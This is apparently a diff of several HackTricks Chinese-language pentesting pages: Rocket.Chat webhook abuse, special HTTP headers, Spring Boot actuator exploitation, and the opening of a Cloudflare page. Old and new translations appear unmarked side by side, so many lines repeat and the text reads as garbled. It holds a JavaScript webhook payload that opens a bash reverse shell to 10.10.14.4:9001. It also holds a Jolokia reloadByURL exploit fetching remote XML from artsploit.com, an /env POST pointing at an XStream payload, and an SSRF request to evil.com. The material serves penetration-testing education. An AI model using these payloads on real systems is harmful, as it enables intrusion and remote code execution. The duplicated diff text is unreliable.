* 转到 **`Integrations`** 并选择 **`New Integration`**,然后选择任意**`Incoming WebHook`** 或 **`Outgoing WebHook`**。
* `/admin/integrations/incoming`
<figure><img src="../../.gitbook/assets/image (266).png" alt=""><figcaption></figcaption></figure>
* 根据[文档](https://docs.rocket.chat/guides/administration/admin-panel/integrations),两者都使用 ES2015 / ECMAScript 6[基本上是 JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c))来处理数据。因此,让我们为 JavaScript 获取一个[用于反向 shell 的 rev shell](../../generic-methodologies-and-resources/shells/linux.md#nodejs)
* 根据 [docs](https://docs.rocket.chat/guides/administration/admin-panel/integrations),两者都使用 ES2015 / ECMAScript 6 ([基本上是 JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) 来处理数据。所以让我们获取一个 [javascript 的 rev shell](../../generic-methodologies-and-resources/shells/linux.md#nodejs),例如
```javascript
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
```
* 配置 WebHook频道和发布者用户名必须存在):
* 配置 WebHook频道和以用户名发布必须存在):
<figure><img src="../../.gitbook/assets/image (905).png" alt=""><figcaption></figcaption></figure>
@ -46,22 +48,24 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
<figure><img src="../../.gitbook/assets/image (937).png" alt=""><figcaption></figcaption></figure>
* 使用 curl 调用它,您应该收到反向 shell
* 使用 curl 调用它,你应该收到 rev shell
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
学习和实践 AWS Hacking<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

151
network-services-pentesting/pentesting-web/special-http-headers.md
View file

@ -1,27 +1,28 @@
# 特殊的HTTP头部
# 特殊 HTTP 头
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 字典工具
## 字典工具
* [https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/web/http-request-headers](https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/web/http-request-headers)
* [https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/Web/http-request-headers](https://github.com/danielmiessler/SecLists/tree/master/Miscellaneous/Web/http-request-headers)
* [https://github.com/rfc-st/humble](https://github.com/rfc-st/humble)
## 更改位置的头
## 更改位置的头
重写**IP来源**
重写 **IP 源**
* `X-Originating-IP: 127.0.0.1`
* `X-Forwarded-For: 127.0.0.1`
@ -38,16 +39,16 @@
* `True-Client-IP: 127.0.0.1`
* `Cluster-Client-IP: 127.0.0.1`
* `Via: 1.0 fred, 1.1 127.0.0.1`
* `Connection: close, X-Forwarded-For`(检查逐跳头部)
* `Connection: close, X-Forwarded-For` (检查逐跳头)
重写**位置**
重写 **位置**
* `X-Original-URL: /admin/console`
* `X-Rewrite-URL: /admin/console`
## 逐跳头
## 逐跳头
逐跳头部是设计为由当前处理请求的代理处理和消耗的头部,而不是端到端头部
逐跳头是设计用于由当前处理请求的代理处理和消费的头,与端到端头相对
* `Connection: close, X-Forwarded-For`
@ -55,7 +56,7 @@
[abusing-hop-by-hop-headers.md](../../pentesting-web/abusing-hop-by-hop-headers.md)
{% endcontent-ref %}
## HTTP请求劫持
## HTTP 请求走私
* `Content-Length: 30`
* `Transfer-Encoding: chunked`
@ -64,53 +65,54 @@
[http-request-smuggling](../../pentesting-web/http-request-smuggling/)
{% endcontent-ref %}
## 缓存头
## 缓存头
**服务器缓存头**
**服务器缓存头**
* **响应中的`X-Cache`**可能具有值**`miss`**(当请求未被缓存时)和值**`hit`**(当已被缓存时)
* **`Cf-Cache-Status`**头部中的行为类似
* **`Cache-Control`**指示资源是否被缓存以及下次资源将再次被缓存的时间:`Cache-Control: public, max-age=1800`
* **`Vary`**通常在响应中用于**指示额外的头部**,即使它们通常不是关键的也会被视为**缓存键**的一部分
* **`Age`**定义对象在代理缓存中存在的时间(以秒为单位)。
* **`Server-Timing: cdn-cache; desc=HIT`**还表示资源已被缓存
* **`X-Cache`** 在响应中可能有值 **`miss`** 当请求未被缓存,值 **`hit`** 当它被缓存
* 在头 **`Cf-Cache-Status`** 中有类似的行为
* **`Cache-Control`** 指示资源是否被缓存以及下次缓存资源的时间:`Cache-Control: public, max-age=1800`
* **`Vary`** 通常在响应中使用,以 **指示额外的头**,这些头被视为 **缓存键的一部分**,即使它们通常不作为键
* **`Age`** 定义对象在代理缓存中存在的时间(以秒为单位)。
* **`Server-Timing: cdn-cache; desc=HIT`** 也指示资源已被缓存
{% content-ref url="../../pentesting-web/cache-deception/" %}
[cache-deception](../../pentesting-web/cache-deception/)
{% endcontent-ref %}
**本地缓存头**
**本地缓存头**
* `Clear-Site-Data`:指示应该被清除的缓存的头部`Clear-Site-Data: "cache", "cookies"`
* `Expires`:包含响应应该过期的日期/时间:`Expires: Wed, 21 Oct 2015 07:28:00 GMT`
* `Pragma: no-cache` 等同于 `Cache-Control: no-cache`
* `Warning`**`Warning`**通用HTTP头部包含有关消息状态可能存在问题的信息。一个响应中可能出现多个`Warning`头。`Warning: 110 anderson/1.3.37 "Response is stale"`
* `Clear-Site-Data`: 指示应删除的缓存的头`Clear-Site-Data: "cache", "cookies"`
* `Expires`: 包含响应应过期的日期/时间:`Expires: Wed, 21 Oct 2015 07:28:00 GMT`
* `Pragma: no-cache` `Cache-Control: no-cache` 相同
* `Warning`: **`Warning`** 一般 HTTP 头包含有关消息状态可能存在问题的信息。响应中可能出现多个 `Warning` 头。`Warning: 110 anderson/1.3.37 "Response is stale"`
## 条件
## 条件请求
* 使用这些头部的请求:**`If-Modified-Since`**和**`If-Unmodified-Since`**将仅在响应头部\*\*`Last-Modified`\*\*包含不同时间时响应数据。
* 使用**`If-Match`**和**`If-None-Match`**的条件请求使用Etag值因此如果数据Etag已更改Web服务器将发送响应内容。`Etag`取自HTTP响应
* **Etag**值通常基于响应内容计算。例如,`ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"`表示`Etag`是响应内容的**Sha1**值,长度为**37字节**。
* 使用这些头的请求:**`If-Modified-Since`** 和 **`If-Unmodified-Since`** 仅在响应头 **`Last-Modified`** 包含不同时间时才会返回数据。
* 使用 **`If-Match`** 和 **`If-None-Match`** 的条件请求使用 Etag 值因此如果数据Etag已更改Web 服务器将发送响应的内容。`Etag` 是从 HTTP 响应中获取的
* **Etag** 值通常**基于响应内容计算的**。例如,`ETag: W/"37-eL2g8DEyqntYlaLp5XLInBWsjWI"` 表示 `Etag`**37 字节****Sha1**。
## 范围请求
* **`Accept-Ranges`**:指示服务器是否支持范围请求,以及范围可以用哪种单位表示。`Accept-Ranges: <range-unit>`
* **`Range`**:指示服务器应返回文档的部分。
* **`If-Range`**创建一个条件范围请求仅当给定的ETag或日期与远程资源匹配时才会被满足。用于防止从不兼容版本的资源下载两个范围。
* **`Content-Range`**:指示完整消息体中部分消息所属的位置。
* **`Accept-Ranges`**: 指示服务器是否支持范围请求,如果支持,则以哪种单位表示范围。`Accept-Ranges: <range-unit>`
* **`Range`**: 指示服务器应返回文档的哪一部分。
* **`If-Range`**: 创建一个条件范围请求,仅在给定的 etag 或日期与远程资源匹配时满足。用于防止从不兼容版本的资源下载两个范围。
* **`Content-Range`**: 指示部分消息在完整消息中的位置。
## 消息体信息
* **`Content-Length`**:资源的大小,以十进制字节为单位
* **`Content-Type`**指示资源的媒体类型
* **`Content-Encoding`**用于指定压缩算法。
* **`Content-Language`**:描述面向受众的人类语言,以便用户根据自己的首选语言进行区分。
* **`Content-Location`**指示返回数据的备用位置。
* **`Content-Length`:** 资源的大小,以字节的十进制数表示
* **`Content-Type`**: 指示资源的媒体类型
* **`Content-Encoding`**: 用于指定压缩算法。
* **`Content-Language`**: 描述面向受众的人类语言,以便允许用户根据用户自己的首选语言进行区分。
* **`Content-Location`**: 指示返回数据的备用位置。
从渗透测试的角度来看这些信息通常是“无用的”但如果资源受到401或403的保护并且您可以找到某种方法来获取这些信息那可能会很有趣。\
例如通过HEAD请求中**`Range`**和**`Etag`**的组合可以通过HEAD请求泄露页面内容
从渗透测试的角度来看,这些信息通常是“无用的”,但如果资源被 **保护** 由 401 或 403并且你能找到某种 **方法****获取** 这些 **信息**,这可能会是 **有趣的**。\
例如,在 HEAD 请求中 **`Range`** 和 **`Etag`** 的组合可以通过 HEAD 请求泄露页面的内容:
* 带有头 `Range: bytes=20-20` 的请求和包含 `ETag: W/"1-eoGvPlkaxxP4HqHv6T3PNhV9g3Y"` 的响应泄露了字节 20 的 SHA1 为 `ETag: eoGvPlkaxxP4HqHv6T3PNhV9g3Y`
* 具有头部`Range: bytes=20-20`的请求,并且响应包含`ETag: W/"1-eoGvPlkaxxP4HqHv6T3PNhV9g3Y"`泄露了字节20的SHA1为`ETag: eoGvPlkaxxP4HqHv6T3PNhV9g3Y`。
## 服务器信息
* `Server: Apache/2.4.1 (Unix)`
@ -118,28 +120,28 @@
## 控制
* **`Allow`**此标头用于指定资源可以处理的HTTP方法。例如可以指定为 `Allow: GET, POST, HEAD`,表示资源支持这些方法。
* **`Expect`**:客户端使用此标头传达服务器需要满足的请求处理期望。常见用例涉及 `Expect: 100-continue` 标头,表示客户端打算发送大数据负载。客户端在继续传输之前会寻找 `100 (Continue)` 响应。此机制有助于通过等待服务器确认来优化网络使用。
* **`Allow`**: 此头用于传达资源可以处理的 HTTP 方法。例如,它可能被指定为 `Allow: GET, POST, HEAD`,表示资源支持这些方法。
* **`Expect`**: 客户端用于传达服务器需要满足的期望,以便请求能够成功处理。一个常见的用例涉及 `Expect: 100-continue` 头,表示客户端打算发送大量数据负载。客户端在继续传输之前会寻找 `100 (Continue)` 响应。此机制有助于通过等待服务器确认来优化网络使用。
## 下载
* HTTP响应中的 **`Content-Disposition`** 头指示文件该内联显示(在网页内)还是作为附件(下载)。例如:
* **`Content-Disposition`** 头在 HTTP 响应中指示文件应显示**内联**(在网页内)还是作为 **附件**(下载)。例如:
```
Content-Disposition: attachment; filename="filename.jpg"
```
这意味着名为"filename.jpg"的文件旨在被下载并保存。
这意味着名为 "filename.jpg" 的文件旨在被下载和保存。
## 安全头部
### 内容安全策略CSP<a href="#csp" id="csp"></a>
### 内容安全策略 (CSP) <a href="#csp" id="csp"></a>
{% content-ref url="../../pentesting-web/content-security-policy-csp-bypass/" %}
[content-security-policy-csp-bypass](../../pentesting-web/content-security-policy-csp-bypass/)
{% endcontent-ref %}
### **受信任类型**
### **受信任类型**
通过CSP强制执行受信任类型应用程序可以受到保护免受DOM XSS攻击。受信任类型确保只有符合既定安全策略的特定对象可以在危险的Web API调用中使用从而默认情况下保护JavaScript代码。
通过 CSP 强制实施受信任的类型,应用程序可以防止 DOM XSS 攻击。受信任的类型确保只有符合既定安全政策的特定构造对象可以用于危险的 Web API 调用,从而默认保护 JavaScript 代码。
```javascript
// Feature detection
if (window.trustedTypes && trustedTypes.createPolicy) {
@ -158,54 +160,55 @@ el.innerHTML = escaped; // Results in safe assignment.
```
### **X-Content-Type-Options**
该标头可防止 MIME 类型嗅探,这种做法可能导致 XSS 漏洞。它确保浏览器遵守服务器指定的 MIME 类型。
此头部防止 MIME 类型嗅探,这种做法可能导致 XSS 漏洞。它确保浏览器尊重服务器指定的 MIME 类型。
```
X-Content-Type-Options: nosniff
```
### **X-Frame-Options**
为了防范点击劫持,该标头限制了文档如何嵌入到 `<frame>`, `<iframe>`, `<embed>`,`<object>` 标签中,建议所有文档明确指定其嵌入权限。
为了对抗点击劫持,此头部限制了文档如何嵌入在 `<frame>`、`<iframe>`、`<embed>``<object>` 标签中,建议所有文档明确指定其嵌入权限。
```
X-Frame-Options: DENY
```
### **跨源资源策略CORP和跨源资源共享CORS**
### **跨源资源策略 (CORP) 和跨源资源共享 (CORS)**
CORP对于指定网站可以加载哪些资源至关重要有助于减轻跨站点泄漏。另一方面CORS允许更灵活的跨源资源共享机制在特定条件下放宽同源策略。
CORP 对于指定哪些资源可以被网站加载至关重要减轻跨站泄漏。另一方面CORS 允许更灵活的跨源资源共享机制,在某些条件下放宽同源策略。
```
Cross-Origin-Resource-Policy: same-origin
Access-Control-Allow-Origin: https://example.com
Access-Control-Allow-Credentials: true
```
### **跨源嵌入策略COEP和跨源打开策略COOP**
### **跨源嵌入者策略 (COEP) 和跨源打开者策略 (COOP)**
COEP和COOP对于启用跨源隔离至关重要大大降低了类似Spectre的攻击风险。它们分别控制跨源资源的加载和与跨源窗口的交互。
COEP 和 COOP 对于启用跨源隔离至关重要,显著降低了类似 Spectre 攻击的风险。它们分别控制跨源资源的加载和与跨源窗口的交互。
```
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin-allow-popups
```
### **HTTP Strict Transport Security (HSTS)**
最后HSTS 是一项安全功能,强制浏览器只能通过安全的 HTTPS 连接与服务器通信,从而增强隐私和安全性。
最后HSTS 是一种安全功能,强制浏览器仅通过安全的 HTTPS 连接与服务器通信,从而增强隐私和安全性。
```
Strict-Transport-Security: max-age=3153600
```
## 参考资料
## 参考文献
* [Content-Disposition](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition)
* [HTTP Headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers)
* [安全头部](https://web.dev/security-headers/)
* [安全头部文章](https://web.dev/articles/security-headers)
* [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Disposition)
* [https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers)
* [https://web.dev/security-headers/](https://web.dev/security-headers/)
* [https://web.dev/articles/security-headers](https://web.dev/articles/security-headers)
{% hint style="success" %}
学习和实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

90
network-services-pentesting/pentesting-web/spring-actuators.md
View file

@ -1,18 +1,20 @@
# Spring Actuators
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
## **Spring Auth Bypass**
@ -20,27 +22,27 @@
**来自** [**https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png**](https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png)\*\*\*\*
## Exploiting Spring Boot Actuators
## 利用 Spring Boot Actuators
**查看原始帖子** \[**https://www.veracode.com/blog/research/exploiting-spring-boot-actuators**]
### **关键点:**
### **关键点**
- Spring Boot Actuators注册诸如`/health`、`/trace`、`/beans`、`/env`等端点。在1到1.4版本中这些端点可以在无需身份验证的情况下访问。从1.5版本开始,默认情况下只有`/health`和`/info`是非敏感的,但开发人员经常禁用此安全性。
- 某些Actuator端点可能会暴露敏感数据或允许有害操作:
- `/dump`、`/trace`、`/logfile`、`/shutdown`、`/mappings`、`/env`、`/actuator/env`、`/restart`和`/heapdump`。
- 在Spring Boot 1.x中actuators注册在根URL下而在2.x中它们在`/actuator/`基本路径下。
* Spring Boot Actuators 注册的端点包括 `/health`、`/trace`、`/beans`、`/env` 等。在 1 到 1.4 版本中,这些端点无需身份验证即可访问。从 1.5 版本开始,只有 `/health``/info` 默认是非敏感的,但开发人员通常会禁用此安全性。
* 某些 Actuator 端点可能会暴露敏感数据或允许有害操作:
* `/dump`、`/trace`、`/logfile`、`/shutdown`、`/mappings`、`/env`、`/actuator/env`、`/restart` `/heapdump`
* 在 Spring Boot 1.x 中actuators 注册在根 URL 下,而在 2.x 中,它们位于 `/actuator/` 基础路径下。
### **利用技术:**
### **利用技术**
1. **通过'/jolokia'实现远程代码执行**:
- `/jolokia` actuator端点暴露了Jolokia库允许通过HTTP访问MBeans
- `reloadByURL`操作可被利用从外部URL重新加载日志配置这可能导致通过精心制作的XML配置进行盲目XXE或远程代码执行。
- 示例利用URL: `http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`.
2. **通过'/env'修改配置**:
- 如果存在Spring Cloud库则`/env`端点允许修改环境属性。
- 可以操纵属性以利用漏洞例如Eureka serviceURL中的XStream反序列化漏洞。
- 示例利用POST请求:
1. **通过 '/jolokia' 进行远程代码执行**
* `/jolokia` actuator 端点暴露了 Jolokia 库,允许对 MBeans 进行 HTTP 访问
* `reloadByURL` 操作可以被利用来从外部 URL 重新加载日志配置,这可能导致盲目 XXE 或通过精心制作的 XML 配置进行远程代码执行。
* 示例利用 URL`http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml`
2. **通过 '/env' 进行配置修改**
* 如果存在 Spring Cloud 库,`/env` 端点允许修改环境属性。
* 可以操纵属性以利用漏洞,例如 Eureka serviceURL 中的 XStream 反序列化漏洞。
* 示例利用 POST 请求:
```
POST /env HTTP/1.1
@ -50,38 +52,40 @@ Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
```
3. **其他有用的设置**:
- 可以操纵属性如`spring.datasource.tomcat.validationQuery`、`spring.datasource.tomcat.url`和`spring.datasource.tomcat.max-active`以进行各种利用例如SQL注入或更改数据库连接字符串。
3. **其他有用的设置**
* 属性如 `spring.datasource.tomcat.validationQuery`、`spring.datasource.tomcat.url` 和 `spring.datasource.tomcat.max-active` 可以被操纵以进行各种利用,例如 SQL 注入或更改数据库连接字符串。
### **附加信息:**
### **附加信息**
- 可以在[这里](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt)找到默认actuators的全面列表
- Spring Boot 2.x中的`/env`端点使用JSON格式进行属性修改,但一般概念保持不变。
* 默认 actuators 的全面列表可以在 [这里](https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt) 找到。
* Spring Boot 2.x 中的 `/env` 端点使用 JSON 格式进行属性修改,但一般概念保持不变。
### **相关主题:**
### **相关主题**
1. **Env + H2 RCE**:
- 有关利用`/env`端点和H2数据库组合的详细信息请查看[此处](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database)。
2. **通过不正确的路径名解释在Spring Boot上进行SSRF**:
- Spring框架在HTTP路径名中处理矩阵参数(`;`)的方式可被利用进行服务器端请求伪造SSRF
- 示例利用请求:
1. **Env + H2 RCE**
* 关于利用 `/env` 端点和 H2 数据库组合的详细信息可以在 [这里](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database) 找到
2. **通过错误的路径名解释在 Spring Boot 上进行 SSRF**
* Spring 框架对 HTTP 路径名中矩阵参数 (`;`) 的处理可以被利用进行服务器端请求伪造 (SSRF)
* 示例利用请求:
```http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
```
```
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
</details>
{% endhint %}

126
network-services-pentesting/pentesting-web/uncovering-cloudflare.md
View file

@ -1,39 +1,40 @@
# 揭示 CloudFlare
# Uncovering CloudFlare
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
